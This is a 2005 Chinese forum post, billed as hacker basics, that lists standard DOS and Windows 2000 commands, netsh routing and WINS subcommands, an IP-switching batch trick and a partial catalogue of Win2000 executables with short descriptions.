找回密码
 注册
搜索
热搜: 超星 读书 找书
查看: 3128|回复: 3

来发个大家喜欢的,有成就感的,命令大全!

[复制链接]
发表于 2005-10-25 23:13:40 | 显示全部楼层 |阅读模式
来发个大家喜欢的,有成就感的,命令大全

不多说了,直接看吧

黑客入门基础知识


DOS 常用命令:

dir 列文件名  deltree 删除目录树  cls 清屏    cd 改变当前目录
copy 拷贝文件  diskcopy 复制磁盘    del 删除文件  format 格式化磁盘
edit 文本编辑  mem 查看内存状况    md 建立子目录  move 移动文件、改目录名
more 分屏显示  type 显示文件内容    rd 删除目录  sys 制作DOS系统盘
ren 改变文件名  xcopy 拷贝目录与文件  chkdsk 检查磁盘  attrib 设置文件属性
fdisk 硬盘分区  date 显示及修改日期  label 设置卷标号  defrag 磁盘碎片整理
msd 系统检测  path 设置搜寻目录    share 文件共享  memmaker内存优化管理
help 帮助    restore 恢复备份文件  set 设置环境变量  time 显示及修改时间
tree 列目录树  debug 随机调试程序  doskey 重新调用DOS命令                                          prempt 设置提示符 undelete恢复被删的文件  scandisk检测、修理磁盘   

不常用DOS命令
diskcomp磁盘比较      append 设置非执行文件路径
expand 还原DOS文件     fasthelp快速显示帮助信息
fc 文件比较      interink启动服务器
setver 设置版本     intersvr启动客户机
subst 路径替换     qbasic Basic集成环境
vsafe 防病毒      unformat恢复已格式化的磁盘
ver 显示DOS版本号     smartdrv设置磁盘加速器
vol 显示磁盘卷标号     lh 将程序装入高端内存  
ctty 改变控制设备     emm386 扩展内存管理
常用命令具体介绍:  

一、Dir

显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
*.后缀
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。

二、Attrib

显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls

清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”

四、Exit
退出当前命令解释程序并返回到系统。

五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。

六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。

七、md
创建目录或子目录

八、Move
将一个或多个文件从一个目录移动到指定的目录。

九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。

十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。

十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba

十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。

十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。

十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。

十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件

十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。

十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。

十九、copy
将一个或多个文件从一个位置复制到其他位置

二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。

网络常用命令:
IPCONFIG
C:\\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 10.1.1.111

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 10.1.1.254


命令一览
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
快速切换IP地址有绝招

在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不

同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了?

因为改完IP地址后不需要重启计算机?,但还要进入网络属性设置中进行操作。有没

有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换?

  答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行

模式(在\"开始→运行\"中键入\"cmd\"即可进入命令行模式),在提示符下键入netsh即

可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配

置信息:

  C:\\Documents and Settings\\Administrator>netsh
  netsh>
  netsh>int ip
  interface ip>dump
  # ----------------------------------
  # 接口 IP 配置
  # ----------------------------------
  pushd interface ip
  # ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定)
  set address name = ″本地连接″ source = static addr = 192.168.0.5 mask

= 255.255.255.0
  set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1
  set dns name = ″本地连接″ source = static addr = 61.237.17.181
  add dns name = ″本地连接″ addr = 211.97.168.129
  add dns name = ″本地连接″ addr = 211.98.4.1
  set wins name = ″本地连接″ source = static addr = none
  # ″本地连接 2″ 的接口 IP 配置
  set address name = ″本地连接 2″ source = dhcp
  set dns name = ″本地连接 2″ source = dhcp
  set wins name = ″本地连接 2″ source = dhcp
  popd
  # 接口 IP 配置结束

快速切换IP地址有绝招 2


现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过\"set address name

=连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码\"

来实现。

  到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,

子网掩码为255.255.255.0,可以进行以下操作:

  C:\\Documents and Settings\\Administrator>netsh
  netsh>int ip
  interface ip>set address name =\"本地连接\"source = static addr =

192.168.0.7 mask = 255.255.255.0
  确认更改。
  interface ip>exit
  再用ipconfig命令核实一下:
  C:\\Documents and Settings\\Administrator>ipconfig
  Windows 2000 IP Configuration
  Ethernet adapter 本地连接 2?
  Media State . . . . . . . . . . . ? Cable Disconnected
  Ethernet adapter 本地连接?
  Connection-specific DNS Suffix . ?
  IP Address. . . . . . . . . . . . ? 192.168.0.7
  Subnet Mask . . . . . . . . . . . ? 255.255.255.0
  Default Gateway . . . . . . . . . ? 192.168.0.2

  从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。

用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一

下忙,离胜利目标就不远了。首先打开记事本,输入以下内容:   int ip
  set address name=″本地连接″ source=static addr=192.168.0.7

mask=255.255.255.0

  然后保存为一个名为\"7.sh\"的文件,放到C盘根目录下,再进入命令行模式,在C

盘根目录下键入\"netsh exec 7.sh\",好像没什么反应啊?不过再用ipconfig查看一下

,会发现IP地址已经改过来了。

  最后再用记事本写一个批处理文件,命名为\"7.bat\",内容为\"netsh exec 7.sh\"

。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速

改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,

只需要改变\"addr\"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段

的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信

息:

  int ip
  set address name = ″本地连接″source = static addr= 172.19.96.7 mask =

255.255.255.0
  set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1

  同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all

命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地

址想换就换?
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令

将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示

Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat

-n,则不能将地址和端口号转换成名称。
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路

径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到

网络上其他主机的路由。
-d 指定不将IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。
pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工

具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最

终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于

命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能

导致网络问题的路由器或链接。
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并

将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络

设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che 检查以确定路径中的每个路由器是否支持\"资源保留协议 (RSVP)\"

,此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连

通性。
在命令提示符下交互使用 DHCP 命令
打开 命令提示符。
键入 netsh。
在 netsh>(Netshell) 命令提示行键入\"dhcp\"。
在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server

\\\\servername 或 server ip_address。
一旦您有权管理的服务器已成功连接,则会看到\"您可以对服务器 servername 进行读

写访问\"
一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。 键入 /? 或

help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一

起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示

常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP

数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设

置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理

器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路

由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示

路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show rtmdestinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口

的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一

个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置


routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除

一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置

或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口

的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置

或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置

或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟

接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外

部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外

部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置\"DHCP 中继代理程序\"的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置\"DHCP

中继代理程序\"设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除

DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的\"DHCP 中继代理程序\"配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的

RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路

由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP

路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口

上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表

中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置


WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输

入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name

/?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name

/?
delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete

partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入

delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细

信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动\"拉\"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init

pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请

输入 init pullrange /?
init push 启动\"推\"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init

push /?
init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入

set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set

autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set

periodicdbchecking /?
set pullpartnerconfig 设置指定的\"拉\"伙伴的配置参数。详细信息,请输入 set

pullpartnerconfig /?
set pushpartnerconfig 设置指定的\"推\"伙伴的配置参数。详细信息,请输入 set

pushpartnerconfig /?
set pullparam 设置服务器的默认\"拉\"参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认\"推\"参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag

/?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion

/?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show

browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database

/?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的\"拉\"或\"推\"(或\"推拉\")伙伴。详细信息,请输入 show

partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show

partnerproperties /?
show pullpartnerconfig 显示\"拉\"伙伴的配置信息。详细信息,请输入 show

pullpartnerconfig /?
show pushpartnerconfig 显示\"推\"伙伴的配置信息。详细信息,请输入 show

pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show

reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show

recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show

statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show

version /?
show versionmap 显示所有者 ID 到\"最大版本数\"的映射。详细信息,请输入 show

versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口

的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名




Win2000命令全集

accwiz.exe > Accessibility Wizard for walking you through setting up your

machine for your mobility needs. 辅助工具向导

acsetups.exe > ACS setup DCOM server executable

actmovie.exe > Direct Show setup tool 直接显示安装工具

append.exe > Allows programs to open data in specified directories as if

they were in the current directory. 允许程序打开制定目录中的数据

arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算

机的IP与硬件物理地址的对应列表

at.exe > AT is a scheduling utility also included with UNIX 计划运行任务

atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计

attrib.exe > Display and modify attributes for files and folders 显示和更改

文件和文件夹属性

autochk.exe > Used to check and repair Windows File Systems 检测修复文件系



autoconv.exe > Automates the file system conversion during reboots 在启动过

程中自动转化系统

autofmt.exe > Automates the file format process during reboots 在启动过程中

格式化进程

autolfn.exe > Used for formatting long file names 使用长文件名格式

bootok.exe > Boot acceptance application for registry bootvrfy.exe >

Bootvrfy.exe, a program included in Windows 2000 that notifies the system

that startup was successful. Bootvrfy.exe can be run on a local or remote

computer. 通报启动成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示

和编辑ACL

calc.exe > Windows Calculators 计算器

cdplayer.exe > Windows CD Player CD播放器

change.exe > Change { User | Port | Logon } 与终端服务器相关的查询

charmap.exe > Character Map 字符映射表

chglogon.exe > Same as using \"Change Logon\" 启动或停用会话记录

chgport.exe > Same as using \"Change Port\" 改变端口(终端服务)

chgusr.exe > Same as using \"Change User\" 改变用户(终端服务)

chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages

must specify a Drive Letter 磁盘检测程序

chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序

cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务

cipher.exe > Displays or alters the encryption of directories [files] on

NTFS partitions. 在NTFS上显示或改变加密的文件或目录

cisvc.exe > Content Index -- It's the content indexing service for I 索引内



ckcnv.exe > Cookie Convertor 变换Cookie

cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理

cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具

clipbrd.exe > Clipboard viewer for Local will allow you to connect to other

clipboards 剪贴簿查看

clipsrv.exe > Start the clipboard Server 运行Clipboard服务

clspack.exe > CLSPACK used to create a file listing of system packages 建立

系统文件列表清

cluster.exe > Display a cluster in a domain 显示域的集群

_cmd_.exe > Famous command prompt 没什么好说的!

cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理

cmmgr32.exe > Connection Manager 连接管理器

cmmon32.exe > Connection Manager Monitor 连接管理器监视

cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装程序

comclust.exe > about cluster server 集群

comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文件集的

内容*

compact.exe > Displays or alters the compression of files on NTFS

partitions. 显示或改变NTFS分区上文件的压缩状态

conime.exe > Console IME IME控制台

control.exe > Starts the control panel 控制面板

convert.exe > Convert File System to NTFS 转换文件系统到NTFS

convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格式

cprofile.exe > Copy profiles 转换显示模式

cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本

csrss.exe > Client Server Runtime Process 客户服务器Runtime进程

csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序

dbgtrace.exe > 和Terminal Server相关

dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性

dcphelp.exe > ?

dcpromo.exe > Promote a domain controller to ADSI AD安装向导

ddeshare.exe > Display DDE shares on local or remote computer DDE共享

ddmprxy.exe >

debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦!

dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序

dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序

dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树

dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化

dfssvc.exe > Distributed File System Server 分布式文件系统服务器

diantz.exe > MS Cabinet Maker 制作CAB文件

diskperf.exe > Starts physical Disk Performance counters 磁盘性能计数器

dllhost.exe > dllhost is used on all versions of Windows 2000. dllhost is

the hedost process for all COM+ applications. 所有COM+应用软件的主进程

dllhst3g.exe >
---------------------------------------------------------------([glow=255,red,2][fly]待续[/fly][/glow])
回复

使用道具 举报

 楼主| 发表于 2005-10-25 23:16:09 | 显示全部楼层
网络常用命令:

dmadmin.exe > Disk Manager Service 磁盘管理服务

dmremote.exe > Part of disk management 磁盘管理服务的一部分

dns.exe > DNS Applications DNS  

doskey.exe > recalls Windows command lines and creates macros 命令行创建宏

dosx.exe > DOS Extender DOS扩展

dplaysvr.exe > Direct Play Helper 直接运行帮助

drwatson.exe > Dr Watson for 2000 Fault Detector 华生医生错误检测

drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager 华生医生

显示和配置管理

dtcsetup.exe > Installs MDTC

dvdplay.exe > Windows 2000 DVD player DVD播放

dxdiag.exe > Direct-X Diagnostics Direct-X诊断工具

edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)

esentutl.exe > MS Database Utility MS数据库工具

eudcedit.exe > Private character editor Ture Type造字程序

eventvwr.exe > Windows 2000 Event Viewer 事件查看器

evnt_cmd_.exe > Event to trap translator; Configuration tool

evntwin.exe > Event to trap translator setup

exe2bin.exe > Converts EXE to binary format 转换EXE文件到二进制

expand.exe > Expand Files that have been compressed 解压缩

extrac32.exe > CAB File extraction utility 解CAB工具

fastopen.exe > Fastopen tracks the location of files on a hard disk and

stores the information in memory for fast access. 快速访问在内存中的硬盘文



faxcover.exe > Fax Cover page editor 传真封面编辑

faxqueue.exe > Display Fax Queue 显示传真队列

faxsend.exe > Fax Wizard for sending faxes 发送传真向导

faxsvc.exe > Starts fax server 启动传真服务

fc.exe > Compares two files or sets of files and their differences 比较两个

文件的不同

find.exe > Searches for a text string in file or files 查找文件中的文本行

findstr.exe > Searches for strings in files 查找文件中的行

finger.exe > Fingers a user and displays statistics on that user Finger一个

用户并显示出统计结果

fixmapi.exe > Fix mapi files 修复MAPI文件

flattemp.exe > Enable or disable temporally directories 允许或者禁用临时文

件目录

fontview.exe > Display fonts in a font file 显示字体文件中的字体

forcedos.exe > Forces a file to start in dos mode. 强制文件在DOS模式下运行

freecell.exe > Popular Windows Game 空当接龙

ftp.exe > File Transfer Protocol used to transfer files over a network

connection 就是FTP了

gdi.exe > Graphic Device Interface 图形界面驱动

grovel.exe >

grpconv.exe > Program Manager Group Convertor 转换程序管理员组

help.exe > displays help for Windows 2000 commands 显示帮助

hostname.exe > Display hostname for machine. 显示机器的Hostname

ie4uinit.exe > IE5 User Install tool IE5用户安装工具

ieshwiz.exe > Customize folder wizard 自定义文件夹向导

